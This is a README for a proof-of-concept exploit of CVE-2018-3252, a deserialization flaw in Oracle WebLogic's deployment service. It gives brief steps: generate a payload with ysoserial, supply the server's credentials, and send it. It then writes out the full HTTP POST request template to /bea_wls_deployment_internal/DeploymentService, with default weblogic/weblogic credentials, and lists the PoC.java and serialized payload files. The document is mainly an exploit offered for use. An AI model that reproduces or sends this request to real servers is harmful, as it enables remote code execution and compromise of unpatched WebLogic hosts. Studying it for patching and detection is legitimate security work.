CVE-2018-3252-PoC# CVE-2018-3252-PoC
#### 1.Generate PoC with YSOSERIAL
#### 2.You should know the `USERNAME` and `PASSWORD` of the target weblogic server
#### 3.Send the payload to the URL
```
POST /bea_wls_deployment_internal/DeploymentService HTTP/1.1
Host: 127.0.0.1:7001
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Upgrade-Insecure-Requests: 1
wl_request_type: data_transfer_request
username: weblogic
password: weblogic
serverName: pyn3rd
deployment_request_id: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.75 Safari/537.36 QQBrowser/4.1.4132.400
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Connection: close
Content-Length: 3334
```
[4.0K] /data/pocs/ece42724cac5af4776f332d28a93f98b13dc421d
├── [591K] 3252.gif
├── [3.5K] PoC-3252.ser
├── [1.6K] PoC.java
└── [ 762] README.md
0 directories, 4 files